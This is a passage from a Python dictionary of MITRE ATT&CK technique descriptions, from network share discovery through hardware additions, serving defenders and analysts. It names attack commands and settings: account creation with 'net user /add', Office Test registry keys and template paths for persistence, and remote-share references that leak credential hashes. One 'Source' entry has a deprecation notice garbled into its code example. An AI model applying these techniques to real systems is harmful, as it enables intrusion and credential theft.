                          'identifying sources of information to gather as a precursor for Collection and to identify '
                          'potential systems of interest for Lateral Movement. Networks often contain shared network '
                          'drives and folders that enable users to access file directories on various systems across a '
                          'network. \n'
                          '\n'
                          'File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia '
                          'Shared Resource) (Citation: TechNet Shared Folder) '
                          '[Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for '
                          'available shared drives using the <code>net view \\\\remotesystem</code> command. It can '
                          'also be used to query shared drives on the local system using <code>net share</code>.',
           'name': 'Network Share Discovery',
           'platforms': ['macOS', 'Windows', 'Linux']},
 'T1136': {'attack_id': 'T1136',
           'categories': ['persistence'],
           'description': 'Adversaries may create an account to maintain access to victim systems. With a sufficient '
                          'level of access, creating such accounts may be used to establish secondary credentialed '
                          'access that do not require persistent remote access tools to be deployed on the system.\n'
                          '\n'
                          'Accounts may be created on the local system or within a domain or cloud tenant. In cloud '
                          'environments, adversaries may create accounts that only have access to specific services, '
                          'which can reduce the chance of detection.',
           'name': 'Create Account',
           'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure AD', 'Azure', 'Office 365']},
 'T1136.001': {'attack_id': 'T1136.001',
               'categories': ['persistence'],
               'description': 'Adversaries may create a local account to maintain access to victim systems. Local '
                              'accounts are those configured by an organization for use by users, remote support, '
                              'services, or for administration on a single system or service. With a sufficient level '
                              'of access, the <code>net user /add</code> command can be used to create a local '
                              'account.\n'
                              '\n'
                              'Such accounts may be used to establish secondary credentialed access that do not '
                              'require persistent remote access tools to be deployed on the system.',
               'name': 'Local Account',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1136.002': {'attack_id': 'T1136.002',
               'categories': ['persistence'],
               'description': 'Adversaries may create a domain account to maintain access to victim systems. Domain '
                              'accounts are those managed by Active Directory Domain Services where access and '
                              'permissions are configured across systems and services that are part of that domain. '
                              'Domain accounts can cover user, administrator, and service accounts. With a sufficient '
                              'level of access, the <code>net user /add /domain</code> command can be used to create a '
                              'domain account.\n'
                              '\n'
                              'Such accounts may be used to establish secondary credentialed access that do not '
                              'require persistent remote access tools to be deployed on the system.',
               'name': 'Domain Account',
               'platforms': ['Windows', 'macOS', 'Linux']},
 'T1136.003': {'attack_id': 'T1136.003',
               'categories': ['persistence'],
               'description': 'Adversaries may create a cloud account to maintain access to victim systems. With a '
                              'sufficient level of access, such accounts may be used to establish secondary '
                              'credentialed access that does not require persistent remote access tools to be deployed '
                              'on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 '
                              'Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create '
                              'Cloud Identity Users)(Citation: Microsoft Azure AD Users)\n'
                              '\n'
                              'Adversaries may create accounts that only have access to specific cloud services, which '
                              'can reduce the chance of detection.',
               'name': 'Cloud Account',
               'platforms': ['AWS', 'GCP', 'Azure', 'Office 365', 'Azure AD']},
 'T1137': {'attack_id': 'T1137',
           'categories': ['persistence'],
           'description': 'Adversaries may leverage Microsoft Office-based applications for persistence between '
                          'startups. Microsoft Office is a fairly common application suite on Windows-based operating '
                          'systems within an enterprise network. There are multiple mechanisms that can be used with '
                          'Office for persistence when an Office-based application is started; this can include the '
                          'use of Office Template Macros and add-ins.\n'
                          '\n'
                          'A variety of features have been discovered in Outlook that can be abused to obtain '
                          'persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) '
                          'These persistence mechanisms can work within Outlook or be used through Office '
                          '365.(Citation: TechNet O365 Outlook Rules)',
           'name': 'Office Application Startup',
           'platforms': ['Windows', 'Office 365']},
 'T1137.001': {'attack_id': 'T1137.001',
               'categories': ['persistence'],
               'description': 'Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised '
                              'system. Microsoft Office contains templates that are part of common Office applications '
                              'and are used to customize styles. The base templates within the application are used '
                              'each time an application starts. (Citation: Microsoft Change Normal Template)\n'
                              '\n'
                              'Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be '
                              'inserted into the base template and used to execute code when the respective Office '
                              'application starts in order to obtain persistence. Examples for both Word and Excel '
                              'have been discovered and published. By default, Word has a Normal.dotm template created '
                              'that can be modified to include a malicious macro. Excel does not have a template file '
                              'created by default, but one can be added that will automatically be loaded.(Citation: '
                              'enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may '
                              'also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) \n'
                              '\n'
                              'Word Normal.dotm location:<br>\n'
                              '<code>C:\\Users\\&lt;username&gt;\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm</code>\n'
                              '\n'
                              'Excel Personal.xlsb location:<br>\n'
                              '<code>C:\\Users\\&lt;username&gt;\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB</code>\n'
                              '\n'
                              'Adversaries may also change the location of the base template to point to their own by '
                              "hijacking the application's search order, e.g. Word 2016 will first look for "
                              'Normal.dotm under <code>C:\\Program Files (x86)\\Microsoft '
                              'Office\\root\\Office16\\</code>, or by modifying the GlobalDotName registry key. By '
                              'modifying the GlobalDotName registry key an adversary can specify an arbitrary '
                              'location, file name, and file extension to use for the template that will be loaded on '
                              'application startup. To abuse GlobalDotName, adversaries may first need to register the '
                              'template as a trusted document or place it in a trusted location.(Citation: '
                              'GlobalDotName Jun 2019) \n'
                              '\n'
                              'An adversary may need to enable macros to execute unrestricted depending on the system '
                              'or enterprise security policy on use of macros.',
               'name': 'Office Template Macros',
               'platforms': ['Windows', 'Office 365']},
 'T1137.002': {'attack_id': 'T1137.002',
               'categories': ['persistence'],
               'description': 'Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain '
                              'persistence on a compromised system. An Office Test Registry location exists that '
                              'allows a user to specify an arbitrary DLL that will be executed every time an Office '
                              'application is started. This Registry key is thought to be used by Microsoft to load '
                              'DLLs for testing and debugging purposes while developing Office applications. This '
                              'Registry key is not created by default during an Office installation.(Citation: '
                              'Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)\n'
                              '\n'
                              'There exist user and global Registry keys for the Office Test feature:\n'
                              '\n'
                              '* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf</code>\n'
                              '* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Office test\\Special\\Perf</code>\n'
                              '\n'
                              'Adversaries may add this Registry key and specify a malicious DLL that will be executed '
                              'whenever an Office application, such as Word or Excel, is started.',
               'name': 'Office Test',
               'platforms': ['Windows', 'Office 365']},
 'T1137.003': {'attack_id': 'T1137.003',
               'categories': ['persistence'],
               'description': 'Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised '
                              'system. Outlook forms are used as templates for presentation and functionality in '
                              'Outlook messages. Custom Outlook forms can be created that will execute code when a '
                              'specifically crafted email is sent by an adversary utilizing the same custom Outlook '
                              'form.(Citation: SensePost Outlook Forms)\n'
                              '\n'
                              'Once malicious forms have been added to the user’s mailbox, they will be loaded when '
                              'Outlook is started. Malicious forms will execute when an adversary sends a specifically '
                              'crafted email to the user.(Citation: SensePost Outlook Forms)',
               'name': 'Outlook Forms',
               'platforms': ['Windows', 'Office 365']},
 'T1137.004': {'attack_id': 'T1137.004',
               'categories': ['persistence'],
               'description': "Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a "
                              'compromised system. Outlook Home Page is a legacy feature used to customize the '
                              'presentation of Outlook folders. This feature allows for an internal or external URL to '
                              'be loaded and presented whenever a folder is opened. A malicious HTML page can be '
                              'crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost '
                              'Outlook Home Page)\n'
                              '\n'
                              'Once malicious home pages have been added to the user’s mailbox, they will be loaded '
                              'when Outlook is started. Malicious Home Pages will execute when the right Outlook '
                              'folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)\n',
               'name': 'Outlook Home Page',
               'platforms': ['Windows', 'Office 365']},
 'T1137.005': {'attack_id': 'T1137.005',
               'categories': ['persistence'],
               'description': 'Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised '
                              'system. Outlook rules allow a user to define automated behavior to manage email '
                              'messages. A benign rule might, for example, automatically move an email to a particular '
                              'folder in Outlook if it contains specific words from a specific sender. Malicious '
                              'Outlook rules can be created that can trigger code execution when an adversary sends a '
                              'specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)\n'
                              '\n'
                              'Once malicious rules have been added to the user’s mailbox, they will be loaded when '
                              'Outlook is started. Malicious rules will execute when an adversary sends a specifically '
                              'crafted email to the user.(Citation: SilentBreak Outlook Rules)',
               'name': 'Outlook Rules',
               'platforms': ['Windows', 'Office 365']},
 'T1137.006': {'attack_id': 'T1137.006',
               'categories': ['persistence'],
               'description': 'Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised '
                              'system. Office add-ins can be used to add functionality to Office programs. (Citation: '
                              'Microsoft Office Add-ins) There are different types of add-ins that can be used by the '
                              'various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, '
                              'Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), '
                              'Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs '
                              'Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)\n'
                              '\n'
                              'Add-ins can be used to obtain persistence because they can be set to execute code when '
                              'an Office application starts. ',
               'name': 'Add-ins',
               'platforms': ['Windows', 'Office 365']},
 'T1140': {'attack_id': 'T1140',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may use [Obfuscated Files or '
                          'Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion '
                          'from analysis. They may require separate mechanisms to decode or deobfuscate that '
                          'information depending on how they intend to use it. Methods for doing that include built-in '
                          'functionality of malware or by using utilities present on the system.\n'
                          '\n'
                          'One such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a '
                          'remote access tool portable executable file that has been hidden inside a certificate file. '
                          '(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the '
                          'Windows <code>copy /b</code> command to reassemble binary fragments into a malicious '
                          'payload. (Citation: Carbon Black Obfuscation Sept 2016)\n'
                          '\n'
                          "Sometimes a user's action may be required to open it for deobfuscation or decryption as "
                          'part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be '
                          'required to input a password to open a password protected compressed/encrypted file that '
                          'was provided by the adversary. (Citation: Volexity PowerDuke November 2016)',
           'name': 'Deobfuscate/Decode Files or Information',
           'platforms': ['Windows', 'Linux', 'macOS']},
 'T1149': {'attack_id': 'T1149',
           'categories': ['defense-evasion'],
           'description': '**This technique has been deprecated and should no longer be used.**\n'
                          '\n'
                          'As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the '
                          'binary’s entry point for execution. Previously, there were two headers to achieve this same '
                          'effect: LC_THREAD and LC_UNIXTHREAD  (Citation: Prolific OSX Malware History). The entry '
                          'point for a binary can be hijacked so that initial execution flows to a malicious addition '
                          '(either another section or a code cave) and then goes back to the initial entry point so '
                          'that the victim doesn’t know anything was different  (Citation: Methods of Mac Malware '
                          'Persistence). By modifying a binary in this way, application whitelisting can be bypassed '
                          'because the file name or application path is still the same.',
           'name': 'LC_MAIN Hijacking',
           'platforms': ['macOS']},
 'T1153': {'attack_id': 'T1153',
           'categories': ['execution'],
           'description': '**This technique has been deprecated and should no longer be used.**\n'
                          '\n'
                          'The <code>source</code> command loads functions into the current shell or executes files in '
                          'the current context. This built-in command can be run in two different ways <code>source '
                          '/path/to/filename [arguments]</code> or <code>.**This technique has been deprecated and '
                          'should no longer be used.** /path/to/filename [arguments]</code>. Take note of the space '
                          'after the ".". Without a space, a new shell is created that runs the program instead of '
                          'running the program within the current context. This is often used to make certain features '
                          "or functions available to a shell or to update a specific shell's environment.(Citation: "
                          'Source Manual)\n'
                          '\n'
                          'Adversaries can abuse this functionality to execute programs. The file executed with this '
                          'technique does not need to be marked executable beforehand.',
           'name': 'Source',
           'platforms': ['Linux', 'macOS']},
 'T1175': {'attack_id': 'T1175',
           'categories': ['lateral-movement', 'execution'],
           'description': '**This technique has been deprecated. Please use [Distributed Component Object '
                          'Model](https://attack.mitre.org/techniques/T1021/003) and [Component Object '
                          'Model](https://attack.mitre.org/techniques/T1559/001).**\n'
                          '\n'
                          'Adversaries may use the Windows Component Object Model (COM) and Distributed Component '
                          'Object Model (DCOM) for local code execution or to execute on remote systems as part of '
                          'lateral movement. \n'
                          '\n'
                          'COM is a component of the native Windows application programming interface (API) that '
                          'enables interaction between software objects, or executable code that implements one or '
                          'more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can '
                          'call methods of server objects, which are typically Dynamic Link Libraries (DLL) or '
                          'executables (EXE).(Citation: Microsoft COM) DCOM is transparent middleware that extends the '
                          'functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local '
                          'computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June '
                          '2019)\n'
                          '\n'
                          'Permissions to interact with local and remote server COM objects are specified by access '
                          'control lists (ACL) in the Registry. (Citation: Microsoft COM ACL)(Citation: Microsoft '
                          'Process Wide Com Keys)(Citation: Microsoft System Wide Com Keys) By default, only '
                          'Administrators may remotely activate and launch COM objects through DCOM.\n'
                          '\n'
                          'Adversaries may abuse COM for local command and/or payload execution. Various COM '
                          'interfaces are exposed that can be abused to invoke arbitrary execution via a variety of '
                          'programming languages such as C, C++, Java, and VBScript.(Citation: Microsoft COM) Specific '
                          'COM objects also exists to directly perform functions beyond code execution, such as '
                          'creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless '
                          'download/execution, and other adversary behaviors such as Privilege Escalation and '
                          'Persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP '
                          'Apr 2018)\n'
                          '\n'
                          'Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the '
                          'context of an appropriately privileged user can remotely obtain arbitrary and even direct '
                          'shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral '
                          'Movement Nov 2017) as well as other Windows objects that contain insecure '
                          'methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan '
                          '2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept '
                          '2017) and may also invoke [Dynamic Data '
                          'Exchange](https://attack.mitre.org/techniques/T1173) (DDE) execution directly through a COM '
                          'created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral '
                          'Movement Nov 2017), bypassing the need for a malicious document.',
           'name': 'Component Object Model and Distributed COM',
           'platforms': ['Windows']},
 'T1176': {'attack_id': 'T1176',
           'categories': ['persistence'],
           'description': 'Adversaries may abuse Internet browser extensions to establish persistence access to victim '
                          'systems. Browser extensions or plugins are small programs that can add functionality and '
                          'customize aspects of Internet browsers. They can be installed directly or through a '
                          "browser's app store and generally have access and permissions to everything that the "
                          'browser can access. (Citation: Wikipedia Browser Extension) (Citation: Chrome Extensions '
                          'Definition)\n'
                          '\n'
                          'Malicious extensions can be installed into a browser through malicious app store downloads '
                          'masquerading as legitimate extensions, through social engineering, or by an adversary that '
                          'has already compromised a system. Security can be limited on browser app stores so it may '
                          'not be difficult for malicious extensions to defeat automated scanners. (Citation: '
                          'Malicious Chrome Extension Numbers) Once the extension is installed, it can browse to '
                          'websites in the background, (Citation: Chrome Extension Crypto Miner) (Citation: ICEBRG '
                          'Chrome Extensions) steal all information that a user enters into a browser (including '
                          'credentials) (Citation: Banker Google Chrome Extension Steals Creds) (Citation: Catch All '
                          'Chrome Extension) and be used as an installer for a RAT for persistence.\n'
                          '\n'
                          'There have also been instances of botnets using a persistent backdoor through malicious '
                          'Chrome extensions. (Citation: Stantinko Botnet) There have also been similar examples of '
                          'extensions being used for command & control  (Citation: Chrome Extension C2 Malware).',
           'name': 'Browser Extensions',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1185': {'attack_id': 'T1185',
           'categories': ['collection'],
           'description': 'Adversaries can take advantage of security vulnerabilities and inherent functionality in '
                          'browser software to change content, modify behavior, and intercept information as part of '
                          'various man in the browser techniques. (Citation: Wikipedia Man in the Browser)\n'
                          '\n'
                          'A specific example is when an adversary injects software into a browser that allows an them '
                          'to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the '
                          'browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser '
                          'Pivot) (Citation: ICEBRG Chrome Extensions)\n'
                          '\n'
                          'Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. '
                          "Browser traffic is pivoted from the adversary's browser through the user's browser by "
                          'setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not '
                          "alter the user's traffic in any way. The proxy connection is severed as soon as the browser "
                          'is closed. Whichever browser process the proxy is injected into, the adversary assumes the '
                          'security context of that process. Browsers typically create a new process for each tab that '
                          'is opened and permissions and certificates are separated accordingly. With these '
                          'permissions, an adversary could browse to any resource on an intranet that is accessible '
                          'through the browser and which the browser has sufficient permissions, such as Sharepoint or '
                          'webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. '
                          '(Citation: cobaltstrike manual)',
           'name': 'Man in the Browser',
           'platforms': ['Windows']},
 'T1187': {'attack_id': 'T1187',
           'categories': ['credential-access'],
           'description': 'Adversaries may gather credential material by invoking or forcing a user to automatically '
                          'provide authentication information through a mechanism in which they can intercept.\n'
                          '\n'
                          'The Server Message Block (SMB) protocol is commonly used in Windows networks for '
                          'authentication and communication between systems for access to resources and file sharing. '
                          'When a Windows system attempts to connect to an SMB resource it will automatically attempt '
                          'to authenticate and send credential information for the current user to the remote system. '
                          '(Citation: Wikipedia Server Message Block) This behavior is typical in enterprise '
                          'environments so that users do not need to enter credentials to access network resources.\n'
                          '\n'
                          'Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems '
                          'as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will '
                          'typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) '
                          '(Citation: Microsoft Managing WebDAV Security)\n'
                          '\n'
                          'Adversaries may take advantage of this behavior to gain access to user account hashes '
                          'through forced SMB/WebDAV authentication. An adversary can send an attachment to a user '
                          'through spearphishing that contains a resource link to an external server controlled by the '
                          'adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place '
                          'a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed '
                          "on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's "
                          'system accesses the untrusted resource it will attempt authentication and send information, '
                          "including the user's hashed credentials, over SMB to the adversary controlled server. "
                          '(Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform '
                          'off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access '
                          'to plaintext credentials. (Citation: Cylance Redirect to SMB)\n'
                          '\n'
                          'There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) '
                          'Some specifics from in-the-wild use include:\n'
                          '\n'
                          '* A spearphishing attachment containing a document with a resource that is automatically '
                          'loaded when the document is opened (i.e. [Template '
                          'Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for '
                          'example, a request similar to <code>file[:]//[remote address]/Normal.dotm</code> to trigger '
                          'the SMB request. (Citation: US-CERT APT Energy Oct 2017)\n'
                          '* A modified .LNK or .SCF file with the icon filename pointing to an external reference '
                          'such as <code>\\\\[remote address]\\pic.png</code> that will force the system to load the '
                          'resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT '
                          'Energy Oct 2017)',
           'name': 'Forced Authentication',
           'platforms': ['Windows']},
 'T1189': {'attack_id': 'T1189',
           'categories': ['initial-access'],
           'description': 'Adversaries may gain access to a system through a user visiting a website over the normal '
                          "course of browsing. With this technique, the user's web browser is typically targeted for "
                          'exploitation, but adversaries may also use compromised websites for non-exploitation '
                          'behavior such as acquiring [Application Access '
                          'Token](https://attack.mitre.org/techniques/T1550/001).\n'
                          '\n'
                          'Multiple ways of delivering exploit code to a browser exist, including:\n'
                          '\n'
                          '* A legitimate website is compromised where adversaries have injected some form of '
                          'malicious code such as JavaScript, iFrames, and cross-site scripting.\n'
                          '* Malicious ads are paid for and served through legitimate ad providers.\n'
                          '* Built-in web application interfaces are leveraged for the insertion of any other kind of '
                          'object that can be used to display web content or contain a script that executes on the '
                          'visiting client (e.g. forum posts, comments, and other user controllable web content).\n'
                          '\n'
                          'Often the website used by an adversary is one visited by a specific community, such as '
                          'government, a particular industry, or region, where the goal is to compromise a specific '
                          'user or set of users based on a shared interest. This kind of targeted attack is referred '
                          'to a strategic web compromise or watering hole attack. There are several known examples of '
                          'this occurring.(Citation: Shadowserver Strategic Web Compromise)\n'
                          '\n'
                          'Typical drive-by compromise process:\n'
                          '\n'
                          '1. A user visits a website that is used to host the adversary controlled content.\n'
                          '2. Scripts automatically execute, typically searching versions of the browser and plugins '
                          'for a potentially vulnerable version. \n'
                          '    * The user may be required to assist in this process by enabling scripting or active '
                          'website components and ignoring warning dialog boxes.\n'
                          '3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n'
                          '4. If exploitation is successful, then it will give the adversary code execution on the '
                          "user's system unless other protections are in place.\n"
                          '    * In some cases a second visit to the website after the initial scan is required before '
                          'exploit code is delivered.\n'
                          '\n'
                          'Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the '
                          'focus of this technique is to exploit software on a client endpoint upon visiting a '
                          'website. This will commonly give an adversary access to systems on the internal network '
                          'instead of external systems that may be in a DMZ.\n'
                          '\n'
                          'Adversaries may also use compromised websites to deliver a user to a malicious application '
                          'designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, '
                          'like OAuth tokens, to gain access to protected applications and information. These '
                          'malicious applications have been delivered through popups on legitimate websites.(Citation: '
                          'Volexity OceanLotus Nov 2017)',
           'name': 'Drive-by Compromise',
           'platforms': ['Windows', 'Linux', 'macOS', 'SaaS']},
 'T1190': {'attack_id': 'T1190',
           'categories': ['initial-access'],
           'description': 'Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or '
                          'program using software, data, or commands in order to cause unintended or unanticipated '
                          'behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. '
                          'These applications are often websites, but can include databases (like SQL)(Citation: NVD '
                          'CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or '
                          'SSH), network device administration and management protocols (like SNMP and Smart '
                          'Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco '
                          'Blog Legacy Device Attacks)), and any other applications with Internet accessible open '
                          'sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending '
                          'on the flaw being exploited this may include [Exploitation for Defense '
                          'Evasion](https://attack.mitre.org/techniques/T1211). \n'
                          '\n'
                          'If an application is hosted on cloud-based infrastructure, then exploiting it may lead to '
                          'compromise of the underlying instance. This can allow an adversary a path to access the '
                          'cloud APIs or to take advantage of weak identity and access management policies.\n'
                          '\n'
                          'For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common '
                          'web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)',
           'name': 'Exploit Public-Facing Application',
           'platforms': ['Linux', 'Windows', 'macOS', 'AWS', 'GCP', 'Azure', 'Network']},
 'T1195': {'attack_id': 'T1195',
           'categories': ['initial-access'],
           'description': 'Adversaries may manipulate products or product delivery mechanisms prior to receipt by a '
                          'final consumer for the purpose of data or system compromise.\n'
                          '\n'
                          'Supply chain compromise can take place at any stage of the supply chain including:\n'
                          '\n'
                          '* Manipulation of development tools\n'
                          '* Manipulation of a development environment\n'
                          '* Manipulation of source code repositories (public or private)\n'
                          '* Manipulation of source code in open-source dependencies\n'
                          '* Manipulation of software update/distribution mechanisms\n'
                          '* Compromised/infected system images (multiple cases of removable media infected at the '
                          'factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware) \n'
                          '* Replacement of legitimate software with modified versions\n'
                          '* Sales of modified/counterfeit products to legitimate distributors\n'
                          '* Shipment interdiction\n'
                          '\n'
                          'While supply chain compromise can impact any component of hardware or software, attackers '
                          'looking to gain execution have often focused on malicious additions to legitimate software '
                          'in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: '
                          'Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a '
                          'desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be '
                          'distributed to a broad set of consumers but only move on to additional tactics on specific '
                          'victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open '
                          'source projects that are used as dependencies in many applications may also be targeted as '
                          'a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM '
                          'Compromise)',
           'name': 'Supply Chain Compromise',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1195.001': {'attack_id': 'T1195.001',
               'categories': ['initial-access'],
               'description': 'Adversaries may manipulate software dependencies and development tools prior to receipt '
                              'by a final consumer for the purpose of data or system compromise. Applications often '
                              'depend on external software to function properly. Popular open source projects that are '
                              'used as dependencies in many applications may be targeted as a means to add malicious '
                              'code to users of the dependency. (Citation: Trendmicro NPM Compromise)  \n'
                              '\n'
                              'Targeting may be specific to a desired victim set or may be distributed to a broad set '
                              'of consumers but only move on to additional tactics on specific victims. ',
               'name': 'Compromise Software Dependencies and Development Tools',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1195.002': {'attack_id': 'T1195.002',
               'categories': ['initial-access'],
               'description': 'Adversaries may manipulate application software prior to receipt by a final consumer '
                              'for the purpose of data or system compromise. Supply chain compromise of software can '
                              'take place in a number of ways, including manipulation of the application source code, '
                              'manipulation of the update/distribution mechanism for that software, or replacing '
                              'compiled releases with a modified version.\n'
                              '\n'
                              'Targeting may be specific to a desired victim set or may be distributed to a broad set '
                              'of consumers but only move on to additional tactics on specific victims.(Citation: '
                              'Avast CCleaner3 2018) (Citation: Command Five SK 2011)  ',
               'name': 'Compromise Software Supply Chain',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1195.003': {'attack_id': 'T1195.003',
               'categories': ['initial-access'],
               'description': 'Adversaries may manipulate hardware components in products prior to receipt by a final '
                              'consumer for the purpose of data or system compromise. By modifying hardware or '
                              'firmware in the supply chain, adversaries can insert a backdoor into consumer networks '
                              'that may be difficult to detect and give the adversary a high degree of control over '
                              'the system. Hardware backdoors may be inserted into various devices, such as servers, '
                              'workstations, network infrastructure, or peripherals.',
               'name': 'Compromise Hardware Supply Chain',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1197': {'attack_id': 'T1197',
           'categories': ['defense-evasion', 'persistence'],
           'description': 'Adversaries may abuse BITS jobs to persistently execute or clean up after malicious '
                          'payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, '
                          'asynchronous file transfer mechanism exposed through [Component Object '
                          'Model](https://attack.mitre.org/techniques/T1559/001) (COM). (Citation: Microsoft COM) '
                          '(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other '
                          'applications preferred to operate in the background (using available idle bandwidth) '
                          'without interrupting other networked applications. File transfer tasks are implemented as '
                          'BITS jobs, which contain a queue of one or more file operations.\n'
                          '\n'
                          'The interface to create and manage BITS jobs is accessible through '
                          '[PowerShell](https://attack.mitre.org/techniques/T1059/001)  (Citation: Microsoft BITS) and '
                          'the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. (Citation: Microsoft '
                          'BITSAdmin)\n'
                          '\n'
                          'Adversaries may abuse BITS to download, execute, and even clean up after running malicious '
                          'code. BITS tasks are self-contained in the BITS job database, without new files or registry '
                          'modifications, and often permitted by host firewalls. (Citation: CTU BITS Malware June '
                          '2016) (Citation: Mondok Windows PiggyBack BITS May 2007) (Citation: Symantec BITS May 2007) '
                          'BITS enabled execution may also enable persistence by creating long-standing jobs (the '
                          'default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a '
                          'job completes or errors (including after system reboots). (Citation: PaloAlto UBoatRAT Nov '
                          '2017) (Citation: CTU BITS Malware June 2016)\n'
                          '\n'
                          'BITS upload functionalities can also be used to perform [Exfiltration Over Alternative '
                          'Protocol](https://attack.mitre.org/techniques/T1048). (Citation: CTU BITS Malware June '
                          '2016)',
           'name': 'BITS Jobs',
           'platforms': ['Windows']},
 'T1199': {'attack_id': 'T1199',
           'categories': ['initial-access'],
           'description': 'Adversaries may breach or otherwise leverage organizations who have access to intended '
                          'victims. Access through trusted third party relationship exploits an existing connection '
                          'that may not be protected or receives less scrutiny than standard mechanisms of gaining '
                          'access to a network.\n'
                          '\n'
                          'Organizations often grant elevated access to second or third-party external providers in '
                          'order to allow them to manage internal systems as well as cloud-based environments. Some '
                          'examples of these relationships include IT services contractors, managed security '
                          'providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The '
                          "third-party provider's access may be intended to be limited to the infrastructure being "
                          'maintained, but may exist on the same network as the rest of the enterprise. As such, '
                          '[Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for '
                          'access to internal network systems may be compromised and used.',
           'name': 'Trusted Relationship',
           'platforms': ['Linux', 'Windows', 'macOS', 'AWS', 'GCP', 'Azure', 'SaaS']},
 'T1200': {'attack_id': 'T1200',
           'categories': ['initial-access'],
           'description': 'Adversaries may introduce computer accessories, computers, or networking hardware into a '
                          'system or network that can be used as a vector to gain access. While public references of '
                          'usage by APT groups are scarce, many penetration testers leverage hardware additions for '
                          'initial access. Commercial and open source products are leveraged with capabilities such as '
                          'passive network tapping (Citation: Ossmann Star Feb 2011), man-in-the middle encryption '
                          'breaking (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck '
                          'Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), adding new '
